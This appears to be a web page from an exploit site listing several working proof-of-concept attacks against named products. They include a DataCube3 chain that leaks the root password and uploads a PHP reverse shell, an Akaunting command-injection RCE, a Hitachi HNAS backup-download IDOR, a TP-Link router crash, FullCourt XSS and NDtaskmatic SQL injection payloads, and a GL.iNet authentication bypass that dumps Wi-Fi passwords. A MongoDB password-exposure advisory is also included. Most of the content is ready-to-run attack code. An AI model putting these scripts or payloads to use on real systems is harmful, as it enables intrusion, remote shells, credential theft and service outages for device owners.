Latest exploits :: CodePwn

<pre><code># Exploit Title: DataCube3 v1.0 - Unrestricted file upload 'RCE' # Date: 7/28/2022 # Exploit Author: Samy Younsi - NS Labs (https://neroteam.com) # Vendor Homepage: https://www.f-logic.jp # Software Link: https://www.f-logic.jp/pdf/support/manual_product/manual_product_datacube3_ver1.0_sc.pdf # Version: Ver1.0 # Tested on: DataCube3 version 1.0 (Ubuntu) # CVE : CVE-2024-25830 + CVE-2024-25832 # Exploit chain reverse shell, information disclosure (root password leak) + unrestricted file upload from __future__ import print_function, unicode_literals from bs4 import BeautifulSoup import argparse import requests import json import urllib3 import re urllib3.disable_warnings() def banner(): dataCube3Logo = """ ▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓▓▓ ▒▒▒▒▒▒▒▒██ DataCube3 Ver1.0 █F-logic▓▓ ▒▒████▒▒██ ████ ████ ██▓▓▓▓▓▓▓▓ ▒▒████▒▒██ ████ ████ ██▓▓▓▓▓▓▓▓ ▒▒▒▒▒▒▒▒██ ████ ████ ██▓▓▓▓▓▓▓▓ ▒▒▒▒▒▒▒▒██ ██▓▓████▓▓ ▒▒▒▒▒▒▒▒██ ██ ██ ██▓▓████▓▓ ▒▒▒▒▒▒▒▒██ █████████████████ ██▓▓▓▓▓▓▓▓ ▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓ \033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m \033[1;91mDataCube3 exploit chain reverse shell\033[1;m FOR EDUCATIONAL PURPOSE ONLY. """ return print('\033[1;94m{}\033[1;m'.format(dataCube3Logo)) def extractRootPwd(RHOST, RPORT, protocol): url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT) try: response = requests.get(url, allow_redirects=False, verify=False, timeout=20) if response.status_code != 302: print('[!] \033[1;91mError: DataCube3 web interface is not reachable. Make sure the specified IP is correct.\033[1;m') exit() soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser') scriptTag = str(soup.find_all('script')[12]).replace(' ', '') rawLeakedData = re.findall('configData:.*,', scriptTag)[0] jsonLeakedData = json.loads('[{}]'.format(rawLeakedData.split('configData:[')[1].split('],')[0])) adminPassword = jsonLeakedData[12]['value'] rootPassword = jsonLeakedData[14]['value'] print('[INFO] DataCube3 leaked credentials successfully extracted: admin:{} | root:{}.\n[INFO] The target must be vulnerable.'.format(adminPassword, rootPassword)) return rootPassword except: print('[ERROR] Can\'t grab the DataCube3 version...') def generateAuthCookie(RHOST, RPORT, protocol, rootPassword): print('[INFO] Generating DataCube3 auth cookie ...') url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT) data = { 'user_id': 'root', 'user_pw': rootPassword, 'login': '%E3%83%AD%E3%82%B0%E3%82%A4%E3%83%B3' } try: response = requests.post(url, data=data, allow_redirects=False, verify=False, timeout=20) if response.status_code != 302: print('[!] \033[1;91mError: An error occur while trying to get the auth cookie, is the root password correct?\033[1;m') exit() authCookie = response.cookies.get_dict() print('[INFO] Authentication successful! Auth Cookie: {}'.format(authCookie)) return authCookie except: print('[ERROR] Can\'t grab the auth cookie, is the root password correct?') def extractAccesstime(RHOST, RPORT, LHOST, LPORT, protocol, authCookie): print('[INFO] Extracting Accesstime ...') url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT) try: response = requests.get(url, cookies=authCookie, allow_redirects=False, verify=False, timeout=20) if response.status_code != 302: print('[!] \033[1;91mError: An error occur while trying to get the accesstime value.\033[1;m') exit() soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser') accessTime = soup.find('input', {'name': 'accesstime'}).get('value') print('[INFO] AccessTime value: {}'.format(accessTime)) return accessTime except: print('[ERROR] Can\'t grab the accesstime value, is the root password correct?') def injectReverseShell(RHOST, RPORT, LHOST, LPORT, protocol, authCookie, accessTime): print('[INFO] Injecting PHP reverse shell script ...') filename='rvs.php' payload = '<?php $sock=fsockopen("{}",{});$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);?>'.format(LHOST, LPORT) data = '-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="add"\r\n\r\nå��ç��è¿½å�\xA0\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="addPhoto"; filename="{}"\r\nContent-Type: image/jpeg\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="accesstime"\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396--\r\n'.format(filename, payload, accessTime) headers = { 'Content-Type': 'multipart/form-data; boundary=---------------------------113389720123090127612523184396' } url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT) try: response = requests.post(url, cookies=authCookie, headers=headers, data=data, allow_redirects=False, verify=False, timeout=20) if response.status_code != 302: print('[!] \033[1;91mError: An error occur while trying to upload the PHP reverse shell script.\033[1;m') exit() shellURL = '{}://{}:{}/images/slideshow/{}'.format(protocol, RHOST, RPORT, filename) print('[INFO] PHP reverse shell script successfully uploaded!\n[INFO] SHELL URL: {}'.format(shellURL)) return shellURL except: print('[ERROR] Can\'t upload the PHP reverse shell script, is the root password correct?') def execReverseShell(shellURL): print('[INFO] Executing reverse shell...') try: response = requests.get(shellURL, allow_redirects=False, verify=False) print('[INFO] Reverse shell successfully executed.') return except Exception as e: print('[ERROR] Reverse shell failed. Make sure the DataCube3 device can reach the host {}:{}') return False def main(): banner() args = parser.parse_args() protocol = 'https' if args.RPORT == 443 else 'http' rootPassword = extractRootPwd(args.RHOST, args.RPORT, protocol) authCookie = generateAuthCookie(args.RHOST, args.RPORT, protocol, rootPassword) accessTime = extractAccesstime(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie) shellURL = injectReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie, accessTime) execReverseShell(shellURL) if __name__ == '__main__': parser = argparse.ArgumentParser(description='Script PoC that exploit an unauthenticated remote command injection on f-logic DataCube3 devices.', add_help=False) parser.add_argument('--RHOST', help='Refers to the IP of the target machine. (f-logic DataCube3 device)', type=str, required=True) parser.add_argument('--RPORT', help='Refers to the open port of the target machine. (443 by default)', type=int, required=True) parser.add_argument('--LHOST', help='Refers to the IP of your machine.', type=str, required=True) parser.add_argument('--LPORT', help='Refers to the open port of your machine.', type=int, required=True) main() </code></pre>

<pre><code># Exploit Title: Akaunting < 3.1.3 - RCE # Date: 08/02/2024 # Exploit Author: u32i@proton.me # Vendor Homepage: https://akaunting.com # Software Link: https://github.com/akaunting/akaunting # Version: <= 3.1.3 # Tested on: Ubuntu (22.04) # CVE : CVE-2024-22836 #!/usr/bin/python3 import sys import re import requests import argparse def get_company(): # print("[INF] Retrieving company id...") res = requests.get(target, headers=headers, cookies=cookies, allow_redirects=False) if res.status_code != 302: print("[ERR] No company id was found!") sys.exit(3) cid = res.headers['Location'].split('/')[-1] if cid == "login": print("[ERR] Invalid session cookie!") sys.exit(7) return cid def get_tokens(url): res = requests.get(url, headers=headers, cookies=cookies, allow_redirects=False) search_res = re.search(r"\"csrfToken\"\:\".*\"", res.text) if not search_res: print("[ERR] Couldn't get csrf token") sys.exit(1) data = {} data['csrf_token'] = search_res.group().split(':')[-1:][0].replace('"', '') data['session'] = res.cookies.get('akaunting_session') return data def inject_command(cmd): url = f"{target}/{company_id}/wizard/companies" tokens = get_tokens(url) headers.update({"X-Csrf-Token": tokens['csrf_token']}) data = {"_token": tokens['csrf_token'], "_method": "POST", "_prefix": "company", "locale": f"en_US && {cmd}"} res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False) if res.status_code == 200: res_data = res.json() if res_data['error']: print("[ERR] Command injection failed!") sys.exit(4) print("[INF] Command injected!") def trigger_rce(app, version = "1.0.0"): print("[INF] Executing the command...") url = f"{target}/{company_id}/apps/install" data = {"alias": app, "version": version, "path": f"apps/{app}/download"} headers.update({"Content-Type":"application/json"}) res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False) if res.status_code == 200: res_data = res.json() if res_data['error']: search_res = re.search(r">Exit Code\:.*<", res_data['message']) if search_res: print("[ERR] Failed to execute the command") sys.exit(6) print("[ERR] Failed to install the app! no command was executed!") sys.exit(5) print("[INF] Executed successfully!") def login(email, password): url = f"{target}/auth/login" tokens = get_tokens(url) cookies.update({ 'akaunting_session': tokens['session'] }) data = { "_token": tokens['csrf_token'], "_method": "POST", "email": email, "password": password } req = requests.post(url, headers=headers, cookies=cookies, data=data) res = req.json() if res['error']: print("[ERR] Failed to log in!") sys.exit(8) print("[INF] Logged in") cookies.update({'akaunting_session': req.cookies.get('akaunting_session')}) def main(): inject_command(args.command) trigger_rce(args.alias, args.version) if __name__=='__main__': parser = argparse.ArgumentParser() parser.add_argument("-u", "--url", help="target url") parser.add_argument("--email", help="user login email.") parser.add_argument("--password", help="user login password.") parser.add_argument("-i", "--id", type=int, help="company id (optional).") parser.add_argument("-c", "--command", help="command to execute.") parser.add_argument("-a", "--alias", help="app alias, default: paypal-standard", default="paypal-standard") parser.add_argument("-av", "--version", help="app version, default: 3.0.2", default="3.0.2") args = parser.parse_args() headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"} cookies = {} target = args.url try: login(args.email, args.password) company_id = get_company() if not args.id else args.id main() except: sys.exit(0) </code></pre>

<pre><code>#!/usr/bin/python3 # # Title: Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore IDOR Vulnerability # CVE: CVE-2023-5808 # Date: 2023-12-13 # Exploit Author: Arslan Masood (@arszilla) # Vendor: https://www.hitachivantara.com/ # Version: < 14.8.7825.01 # Tested On: 13.9.7021.04 import argparse from datetime import datetime from os import getcwd import requests parser = argparse.ArgumentParser( description="CVE-2023-5808 PoC", usage="./CVE-2023-5808.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>" ) # Create --host argument: parser.add_argument( "--host", required=True, type=str, help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443" ) # Create --id argument: parser.add_argument( "--id", required=True, type=str, help="JSESSIONID cookie value" ) # Create --sso argument: parser.add_argument( "--sso", required=True, type=str, help="JSESSIONIDSSO cookie value" ) args = parser.parse_args() def download_file(hostname, jsessionid, jsessionidsso): # Set the filename: filename = f"smu_backup-{datetime.now().strftime('%Y-%m-%d_%H%M')}.zip" # Vulnerable SMU URL: smu_url = f"https://{hostname}/mgr/app/template/simple%2CBackupSmuScreen.vm/password/" # GET request cookies smu_cookies = { "JSESSIONID": jsessionid, "JSESSIONIDSSO": jsessionidsso } # GET request headers: smu_headers = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Dnt": "1", "Referer": f"https://{hostname}/mgr/app/action/admin.SmuBackupRestoreAction/eventsubmit_doperform/ignored", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1", "Te": "trailers", "Connection": "close" } # Send the request: with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download: with open(filename, 'wb') as backup_archive: # Write the zip file to the CWD: backup_archive.write(file_download.content) print(f"{filename} has been downloaded to {getcwd()}") if __name__ == "__main__": download_file(args.host, args.id, args.sso) </code></pre>

<pre><code># Exploit Title: TP-Link TL-WR740N - Buffer Overflow 'DOS' # Date: 8/12/2023 # Exploit Author: Anish Feroz (ZEROXINN) # Vendor Homepage: http://www.tp-link.com # Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n # Tested on: TP-Link TL-WR740N #Description: #There exist a buffer overflow vulnerability in TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request. To bring back the http (webserver), a user must physically reboot the router. #Usage: #python3 target username password #change port, if required ------------------------------------------------POC----------------------------------------- #!/usr/bin/python import requests from requests.auth import HTTPBasicAuth import base64 def send_request(ip, username, password): auth_url = f"http://{ip}:8082" target_url = f"http://{ip}:8082/userRpm/PingIframeRpm.htm?ping_addr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&doType=ping&isNew=new&sendNum=4&pSize=64&overTime=800&trHops=20" credentials = f"{username}:{password}" encoded_credentials = base64.b64encode(credentials.encode()).decode() headers = { "Host": f"{ip}:8082", "Authorization": f"Basic {encoded_credentials}", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": f"http://{ip}:8082/userRpm/DiagnosticRpm.htm", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } session = requests.Session() response = session.get(target_url, headers=headers) if response.status_code == 200: print("Server Crashed") print(response.text) else: print(f"Script Completed with status code {response.status_code}") ip_address = input("Enter IP address of the host: ") username = input("Enter username: ") password = input("Enter password: ") send_request(ip_address, username, password) </code></pre>

<pre><code>Title: MongoDB MONGOSH Password Exposure Vulnerability Product: MongoDB database Tool: mongosh Affected Version(s): 2.0.1 , 2.1.1,2.1.4,2.1.5 Tested Version(s): 2.0.1 , 2.1.1,2.1.4,2.1.5 Risk Level: Low Author of Advisory: Emad Al-Mousa ***************************************** Vulnerability Details: Vulnerability in MongoDB database system "mongosh" which is a JavaScript and Node.js REPL environment for interacting with MongoDB deployments in Atlas , locally, or on another remote host. So, its basically a command line utility to run database commands and java scripts against back-end MongoDB database system. MONGOSH has two vulnerbailites where passwords can be exposed and leaked in which an attacker to the operating system can weaponize for unauthorized access to the MongoDB database system. ***************************************** Proof of Concept (PoC): Vulnerability No1. : passwordPrompt() showing password displayed in clear text per documentation: https://www.mongodb.com/docs/manual/reference/method/passwordPrompt/#mongodb-method-passwordPrompt The password should not be displayed, however I found out that it appears clearly in the prompt ! The password function passwordPrompt() was tested and used in conjunction with db.createUser, db.changeUserPassword, db.auth commands and all of them were allowing clear text password to appear. admin> use admin already on db admin admin> db.createUser({user:"mongo2", pwd: passwordPrompt(), roles:["root"]}) Enter password mongo *****{ ok: 1 } admin> Vulnerability No2. : Password is exposed in mongosh_repl_history file with db.auth command Mongosh was tested with both “remove”& “remove-redact” modes config.set (redactHistory, “remove-redact”) config.set (‘redactHistory’, “remove”) In Linux Red Hat Environment the file: $MONGOHOME/.mongodb/mongosh/mongosh_repl_history Contains the password in clear text for historical commands run for authentication db.auth() and db.createUser , per documentation: https://www.mongodb.com/docs/mongodb-shell/logs/ the logs should omit the credentials but this didn’t happen ! In windows operating system environment the file: C:\Users\windows_profile_user\AppData\Roaming\mongodb\mongosh Commands running for database creation db.createUser and db.auth() are logging the username, password explicitly as shown below: cat mongosh_repl_history use admin db.createUser({user:"mongo2", pwd: passwordPrompt(), roles:["root"]}) ***************************************** References: https://databasesecurityninja.wordpress.com/2024/03/07/mongodb-mongosh-password-exposure-vulnerability/ https://www.mongodb.com/docs/manual/reference/method/passwordPrompt/#mongodb-method-passwordPrompt https://www.mongodb.com/docs/mongodb-shell/logs/ </code></pre>

<pre><code># Exploit Title: FullCourt enterprise XSS # Date: 2023-28-12 # Exploit Author: Omar Sabagh # Author Linkedin: https://www.linkedin.com/in/omar-s-b937791a2/ # Vendor Homepage: https://www.justicesystems.com # Software Link: https://www.justicesystems.com/products/fullcourt-enterprise/ # Version: FullCourt enterprise - V8.2 # CVE : CVE-2024-25327 # Summary: During a penetration test conducted in December of 2023, It was discovered that the full court enterprise web application was susceptible to reflected (obfuscated and unobfuscated) XSS attacks which could be injected in multiple parameters. This allows an attacker to redirect victims, create pop ups and load external resources (such as externally hosted images). # POC: XSS example 1.) GET /fullcourtweb/courtCase.do?courtCaseBean.currentDefendantID=&formatCaseType=&formatCaseYear=2023&formatCaseNumber=0000000b9wsx%3cscript%3ealert(1)%3c%2fscript%3ec5yblw44633&retrieveAction.x=0&retrieveAction.y=0&courtCaseBean.criminalJuvenileCaseDomesticViolenceIndicator=&courtCaseBean.physicalFile=&courtCaseBean.sealed=&courtCaseBean.juryRequested=&courtCaseBean.batchLabelPrint=&courtCaseBean.juryVerdict=&courtCaseBean.citationImportCase=&doLabelSelect=false&printTrafficJacket=false&reportBean.reportMode=ledger&labelType=on HTTP/1.1 --The value of the formatCaseNumber request parameter is copied into the HTML document as plain text between tags. The payload b9wsx<script>alert(1)</script>c5yblw44633 was submitted in the formatCaseNumber parameter. This input was echoed unmodified in the application's response. --This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. --The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack. XSS example 2.) GET /fullcourtweb/courtCase.do?courtCaseBean.currentDefendantID=&formatCaseType=&formatCaseYear=2023&formatCaseNumber=0000000vymvd%d3cscript%3ealert(1)%3c%2fscript%3erkoqwks4vtrfy0vi%3cscript%3ealert(1)%3c%2fscript%3egonoz&retrieveAction.x=0&retrieveAction.y=0&courtCaseBean.juryRequested=&courtCaseBean.batchLabelPrint=&courtCaseBean.physicalFile=&courtCaseBean.sealed=&=&doLabelSelect=false&printTrafficJacket=false&reportBean.reportMode=ledger&labelType=on HTTP/1.1 --The value of the formatCaseNumber request parameter is copied into the HTML document as plain text between tags. The payload fy0vi<script>alert(1)</script>gonoz was submitted in the formatCaseNumber parameter. This input was echoed unmodified in the application's response. XSS example 3.) --Unobfuscated direct URL injection https://example-site.com/fullcourtweb/mvc/citationSearch?Index=1&r=qQDpfmw1%3C<script>alert('Bob--you owe 500 dollars,click here to resolve')</script>%3Ex5zbiql8jrw&citationNumber=12345&searchAction= --Obfuscated direct URL injection: https://example-site.com/fullcourtweb/mvc/citationSearch?Index=1&r=qQDpfmw1%3C%73cr%69pt%3E%61ler%74(%27%4F%77ned%20%62y%20%4Fm%61r%27)%3C%2f%73cr%69pt%3Ex5zbiql8jrw&citationNumber=53267&searchAction= --For both examples, The value of the r request parameter is copied into the HTML document as plain text between tags. The payloads were submitted in the r parameter. This input was echoed unmodified in the application's response. </code></pre>

<pre><code>## Title: NDtaskmatic-1.0-by-Mayuri.K Multiple-SQLi ## Author: nu11secur1ty ## Date: 03/07/2024 ## Vendor: https://www.mayurik.com/ ## Software: https://www.sourcecodester.com/php/17217/employee-management-system-php-and-mysql-free-download.html ## Reference: https://portswigger.net/web-security/sql-injection ## Description: Potential SQLi detected. Please manually confirm it after you check manually the POST, GET, or other requests... The payload from the puncher_SQLi_bypass_authentication module was submitted successfully after the test. The task_id is vulnerable to SQLi attacks, the attacker can get all information from the system by using this vulnerability! STATUS: HIGH- Vulnerability [+]Payload: ```mysql --- Parameter: task_id (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: task_id=39' AND (SELECT 8670 FROM(SELECT COUNT(*),CONCAT(0x7176767871,(SELECT (ELT(8670=8670,1))),0x717a717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# FrpM Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: task_id=39';SELECT SLEEP(7)# Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: task_id=39' AND (SELECT 9072 FROM (SELECT(SLEEP(7)))RtEq)# XSsn --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2024/NDtaskmatic-1.0-by-Mayuri.K) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2024/03/ndtaskmatic-10-by-mayurik-multiple-sqli.html) ## Time spend: 00:35:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> </code></pre>

<pre><code>DZONERZY Security Research GLiNet: Router Authentication Bypass ======================================================================== Contents ======================================================================== 1. Overview 2. Detailed Description 3. Exploit 4. Timeline ======================================================================== 1. Overview ======================================================================== CVE-2023-46453 is a remote authentication bypass vulnerability in the web interface of GLiNet routers running firmware versions 4.x and up. The vulnerability allows an attacker to bypass authentication and gain access to the router's web interface. ======================================================================== 2. Detailed Description ======================================================================== The vulnerability is caused by a lack of proper authentication checks in /usr/sbin/gl-ngx-session file. The file is responsible for authenticating users to the web interface. The authentication is in different stages. Stage 1: During the first stage the user send a request to the challenge rcp endpoint. The endpoint returns a random nonce value used later in the authentication process. Stage 2: During the second stage the user sends a request to the login rcp endpoint with the username and the encrypted password. The encrypted password is calculated by the following formula: md5(username + crypt(password) + nonce) The crypt function is the standard unix crypt function. The vulnerability lies in the fact that the username is not sanitized properly before being passed to the login_test function in the lua script. ------------------------------------------------------------------------ local function login_test(username, hash) if not username or username == "" then return false end for l in io.lines("/etc/shadow") do local pw = l:match('^' .. username .. ':([^:]+)') if pw then for nonce in pairs(nonces) do if utils.md5(table.concat({username, pw, nonce}, ":")) == hash then nonces[nonce] = nil nonce_cnt = nonce_cnt - 1 return true end end return false end end return false end ------------------------------------------------------------------------ This script check the username against the /etc/shadow file. If the username is found in the file the script will extract the password hash and compare it to the hash sent by the user. If the hashes match the user is authenticated. The issue is that the username is not sanitized properly before being concatenated with the regex. This allows an attacker to inject a regex into the username field and modify the final behavior of the regex. for instance, the following username will match the userid of the root user: root:[^:]+:[^:]+ will become root:[^:]+:[^:]+:([^:]+) This will match the "root:" string and then any character until the next ":" character. This will cause the script skip the password and return the user id instead. Since the user id of the root user is always 0, the script will always return: md5("root:[^:]+:[^:]+" + "0" + nonce) Since this value is always the same, the attacker can simply send the known hash value to the login rcp endpoint and gain access to the web interface. Anyway this approach won't work as expected since later in the code inside the this check appear: ------------------------------------------------------------------------ local aclgroup = db.get_acl_by_username(username) local sid = utils.generate_id(32) sessions[sid] = { username = username, aclgroup = aclgroup, timeout = time_now() + session_timeout } ------------------------------------------------------------------------ The username which is now our custom regex will be passed to the get_acl_by_username function. This function will check the username against a database and return the aclgroup associated with the username. If the username is not found in the database the function will return nil, thus causing attack to fail. By checking the code we can see that the get_acl_by_username function is actually appending our raw string to a query and then executing it. This means that we can inject a sql query into the username field and make it return a valid aclgroup. ------------------------------------------------------------------------ M.get_acl_by_username = function(username) if username == "root" then return "root" end local db = sqlite3.open(DB) local sql = string.format("SELECT acl FROM account WHERE username = '%s'", username) local aclgroup = "" for a in db:rows(sql) do aclgroup = a[1] end db:close() return aclgroup end ------------------------------------------------------------------------ Using this payload we were able to craft a username which is both a valid regex and a valid sql query: roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+ this will make the sql query become: SELECT acl FROM account WHERE username = 'roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+' which will return the aclgroup of the root user (root). ======================================================================== 3. Exploit ======================================================================== ------------------------------------------------------------------------ # Exploit Title: [CVE-2023-46453] GL.iNet - Authentication Bypass # Date: 18/10/2023 # Exploit Author: Daniele 'dzonerzy' Linguaglossa # Vendor Homepage: https://www.gl-inet.com/ # Vulnerable Devices: # GL.iNet GL-MT3000 (4.3.7) # GL.iNet GL-AR300M(4.3.7) # GL.iNet GL-B1300 (4.3.7) # GL.iNet GL-AX1800 (4.3.7) # GL.iNet GL-AR750S (4.3.7) # GL.iNet GL-MT2500 (4.3.7) # GL.iNet GL-AXT1800 (4.3.7) # GL.iNet GL-X3000 (4.3.7) # GL.iNet GL-SFT1200 (4.3.7) # And many more... # Version: 4.3.7 # Firmware Release Date: 2023/09/13 # CVE: CVE-2023-46453 from urllib.parse import urlparse import requests import hashlib import random import sys def exploit(url): try: requests.packages.urllib3.disable_warnings() host = urlparse(url) url = f"{host.scheme}://{host.netloc}/rpc" print(f"[*] Target: {url}") print("[*] Retrieving nonce...") nonce = requests.post(url, verify=False, json={ "jsonrpc": "2.0", "id": random.randint(1000, 9999), "method": "challenge", "params": {"username": "root"} }, timeout=5).json() if "result" in nonce and "nonce" in nonce["result"]: print(f"[*] Got nonce: {nonce['result']['nonce']} !") else: print("[!] Nonce not found, exiting... :(") sys.exit(1) print("[*] Retrieving authentication token for root...") md5_hash = hashlib.md5() md5_hash.update( f"roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+:0:{nonce['result']['nonce']}".encode()) password = md5_hash.hexdigest() token = requests.post(url, verify=False, json={ "jsonrpc": "2.0", "id": random.randint(1000, 9999), "method": "login", "params": { "username": f"roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+", "hash": password } }, timeout=5).json() if "result" in token and "sid" in token["result"]: print(f"[*] Got token: {token['result']['sid']} !") else: print("[!] Token not found, exiting... :(") sys.exit(1) print("[*] Checking if we are root...") check = requests.post(url, verify=False, json={ "jsonrpc": "2.0", "id": random.randint(1000, 9999), "method": "call", "params": [token["result"]["sid"], "system", "get_status", {}] }, timeout=5).json() if "result" in check and "wifi" in check["result"]: print("[*] We are authenticated as root! :)") print("[*] Below some info:") for wifi in check["result"]["wifi"]: print(f"[*] --------------------") print(f"[*] SSID: {wifi['ssid']}") print(f"[*] Password: {wifi['passwd']}") print(f"[*] Band: {wifi['band']}") print(f"[*] --------------------") else: print("[!] Something went wrong, exiting... :(") sys.exit(1) except requests.exceptions.Timeout: print("[!] Timeout error, exiting... :(") sys.exit(1) except KeyboardInterrupt: print(f"[!] Something went wrong: {e}") if __name__ == "__main__": print("GL.iNet Auth Bypass\n") if len(sys.argv) < 2: print( f"Usage: python3 {sys.argv[1]} https://target.com", file=sys.stderr) sys.exit(0) else: exploit(sys.argv[1]) ------------------------------------------------------------------------ ======================================================================== 4. Timeline ======================================================================== 2023/09/13 - Vulnerability discovered 2023/09/14 - CVE-2023-46453 requested 2023/09/20 - Vendor contacted 2023/09/20 - Vendor replied 2023/09/30 - CVE-2023-46453 assigned 2023/11/08 - Vulnerability patched and fix released </code></pre>